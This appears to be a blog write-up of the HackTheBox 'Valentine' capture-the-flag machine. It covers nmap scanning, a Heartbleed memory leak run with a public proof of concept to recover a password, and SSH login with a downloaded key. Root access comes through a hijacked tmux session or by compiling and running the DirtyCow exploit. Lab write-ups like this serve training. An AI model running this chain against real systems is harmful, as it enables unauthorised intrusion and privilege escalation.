Post

HackTheBox Valentine Writeup

Posted
By x3ric
3 min read

Explore the fundamentals of cybersecurity in the Valentine Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.10.79 valentine.htb

Script to add hosts automatically

1
2
3

ip="10.10.10.79"
domain="valentine.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV valentine.htb -Pn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2024-10-06T15:19:57+00:00; 0s from scanner time.
Service Info: Host: 10.10.10.136; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-0160 (Heartbleed Vulnerability)

Validate Vulnerability:

1

nmap --script=ssl-heartbleed -p 443 valentine.htb -Pn

Download the Proof of Concept (PoC):

1
2

git clone https://github.com/sensepost/heartbleed-poc.git
cd heartbleed-poc

Use the PoC and Extract the Password from the Dump:

1
2

python2 heartbleed-poc.py -n1 -f dump.bin valentine.htb -p 443
strings dump.bin | tail -n 1 | sed 's/\$text=//' | base64 -d

Note: This command might need to be run multiple times to capture the necessary data.

Enumeration

Perform Directory Bruteforcing:

1

dirb http://valentine.htb

Results:

1
2
3
4
5
6
7

+ http://10.10.10.79/cgi-bin/ (CODE:403 | SIZE:287)
+ http://10.10.10.79/decode (CODE:200 | SIZE:552)
+ http://10.10.10.79/dev/    (DIRECTORY)
+ http://10.10.10.79/encode (CODE:200 | SIZE:554)
+ http://10.10.10.79/index (CODE:200 | SIZE:38)
+ http://10.10.10.79/index.php (CODE:200 | SIZE:38)
+ http://10.10.10.79/server-status (CODE:403 | SIZE:292)

Investigate the /dev/ Directory:

Going to http://valentine.htb/dev/, you find two files:

  1. notes.txt
  2. hype_key

Contents of notes.txt:

1
2
3
4
5
6
7

To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Download the Encrypted Key from hype_key and ssh in the machine:

1
2
3
4
5
6

curl -sk http://10.10.10.79/dev/hype_key > hype_key
cat hype_key | xxd -r -p > hype_key_encrypted
openssl rsa -in hype_key_encrypted -out hype.key
chmod 600 hype.key
rm -rf hype_key hype_key_encrypted
ssh -i hype.key hype@valentine.htb -o PubkeyAcceptedKeyTypes=+ssh-rsa

Privilege Escalation

Find the user.txt Flag:

1

find . -name user.txt -exec wc -c {} \; -exec cat {} \;

Check for Processes Running as Root (e.g., tmux):

1

ps -ef | grep tmux

You find a running tmux session.

Retrieve Commands from History:

1

history

From the history, the following command is revealed:

1

tmux -S /.devs/dev_sess

This gives access to a tmux session where you can now obtain the root.txt flag:

1

cat /root/root.txt

Alternative Privilege Escalation (DirtyCow)

We suspect the system is running an old kernel vulnerable to DirtyCow (CVE-2016-5195). To confirm, we check the kernel version:

1

uname -a

Output:

1

Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux

The version is vulnerable. Next, we use searchsploit to find available DirtyCow exploits:

1

searchsploit dirty

From the results, we select an exploit that modifies /etc/passwd to add a new root user. We download the exploit:

1

searchsploit -m exploits/linux/local/40839.c

Upload the exploit to the target:

1

scp -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype.key 40839.c hype@valentine.htb:/home/hype/

Run the exploit:

1
2
3

gcc -pthread 40839.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow

switch to the created user

1

su firefart

You now have root access via the new user created by the DirtyCow exploit.

ctf
htb cft writeup linux cve-2014-0160 cve-2016-5195
This post is licensed under CC BY 4.0 by the author.